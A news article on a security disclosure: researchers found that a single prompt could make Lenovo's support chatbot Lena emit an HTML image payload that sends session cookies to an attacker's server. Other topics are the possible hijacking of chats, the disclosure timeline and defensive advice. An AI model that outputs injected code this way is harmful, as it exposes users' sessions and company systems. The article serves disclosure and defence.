Virus-prone insecurity in Lenovo's client support AI bot may empower hackers to execute harmful computer code, access sensitive networks
In a recent investigation by Cybernews, security vulnerabilities were uncovered in Lenovo's customer service AI chatbot, Lena. These vulnerabilities could potentially allow attackers to steal data and compromise customer support systems.
The researchers found that through cross-site scripting (XSS), it was possible to inject malicious code and steal session cookies with a single prompt. This ensured that the malicious payload would be correctly executed by the web server. When the browser failed to load an image, it was instructed to make a network request to an attacker-controlled server and send all cookie data as part of a URL.
An attacker, once logged in to the Lenovo chatbot, could potentially access active chats with other users, previous conversations, and data. It might be possible for an attacker to execute some system commands, which could allow for the installation of backdoors and lateral movement across the network.
The researchers also advised that Large Language Models (LLMs) don't have an instinct for 'safe'. They follow instructions exactly as given. Without strong guardrails and continuous monitoring, even small oversights can turn into major security incidents.
Zilvinas Girenas, head of product at nexos.ai, commented that any AI system without strict input and output controls creates an opening for attackers. Inline JavaScript should be avoided, and content type validation should extend through the entire stack to prevent unintended HTML rendering.
The researchers recommended using a strict whitelist of allowed characters, data types, and formats for all user inputs, with all problematic characters automatically encoded or escaped, as well as for all chatbot responses.
The flaw was disclosed by the researchers on July 22, and was acknowledged by Lenovo on August 6. The flaw was mitigated by August 18, but Lenovo did not respond for comment by the time of publication. It was not mentioned if the platform approached any other parties for comment.
The article does not provide information about the source of the article or the identity of the researchers. It also does not mention if the vulnerabilities were exploited or if any data was actually stolen. The flaw, however, highlights the potential dangers of overly 'helpful' AI blindly following instructions, potentially putting customer privacy and company security at serious risk.
Read also:
- Industries Under Jeopardy Due to Multi-Accounting: Prevention Strategies Revealed in 2024
- Web3 Esports undergoes transformation as Aylab and CreataChain collaborate for a radical change
- Latest Tech Highlights: Top Gadgets of March 2025
- Law enforcement access to encrypted user data is denied by Apple, following a UK court order.